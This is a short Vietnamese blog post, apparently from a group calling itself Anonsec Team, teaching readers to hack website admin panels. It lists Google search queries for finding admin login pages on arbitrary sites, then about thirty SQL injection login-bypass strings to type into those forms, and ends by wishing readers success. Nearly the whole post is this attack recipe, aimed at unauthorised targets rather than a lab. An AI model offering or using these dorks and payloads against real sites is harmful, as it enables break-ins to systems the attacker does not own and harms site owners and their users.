Xin chào , hôm nay Anonsec Team sẽ chỉ cho các bạn hack một trang quản trị sử dụng kiểu attack SQL injection, bằng cách sử dụng SQL injection chúng ta có thể sử dụng nhiều kiểu attack khác nhau, SQL injection là chủ yếu được biết đến như là một vector tấn công trang web, Nó được dùng để attack bất kì loại hình cơ sở dữ liệu nào
 |
| Cách Hack Website sử dụng SQL injection |
Chẳng Nói lòng vòng nữa , mình chỉ thẳng luôn, cái này chắc ai cũng biết nữa. Bạn copy đoạn bên Dưới :
Rồi Dán ra Google
- “inurl:login/admin.asp”
- “inurl:admin/login.asp”
- -“inurl:adminlogin.asp”
- “inurl:adminhome.asp”
- “inurl:admin_login.asp”
- “inurl:administratorlogin.asp”
- “inurl:login/administrator.asp”
- “inurl:administrator_login.asp”
- “inurl: admin.php "
- " inurl: login/ admin.php "
- " inurl: admin / login.php "
- " inurl: adminlogin.php "
- " inurl: adminhome.php "
- " inurl: admin_login.php "
- " inurl: administratorlogin.php "
- "inurl: login/ administrator.php"
- "inurl: administrator_login.php"
 |
| Cách Hack Website sử dụng SQL injection |
Bước 2 : có rất nhiều trang, bạn chọn đại 1 Trang, Rồi dùng đoạn mã dưới này để tiêm vào :D Đa Số Trang Đăng Nhập đều Để Nguyên mặc định là Admin
- test’or1–
- ‘or 1=1#
- 1’or’1’=’1
- ‘)or1=1—
- ‘or ” = ‘
- ‘or’1’=’1
- ‘ or ‘1’=’1
- ‘ or ‘x’=’x
- ‘ or 0=0 –
- ” or 0=0 –
- or 0=0 –
- ‘ or 0=0 #
- ” or 0=0 #
- or 0=0 #
- ‘ or ‘x’=’x
- ” or “x”=”x
- ‘) or (‘x’=’x
- ‘ or 1=1–
- ” or 1=1–
- or 1=1–
- ‘ or a=a–
- ” or “a”=”a
- ‘) or (‘a’=’a
- “) or (“a”=”a
- hi” or “a”=”a
- hi” or 1=1 –
- hi’ or 1=1 –
- ‘or’1=1′
- ‘or’ ‘=’
Sau Khi Tiêm các bạn gữi Và Xem được không nhé
Chúc Các Bạn Thành Công
Không có nhận xét nào:
Đăng nhận xét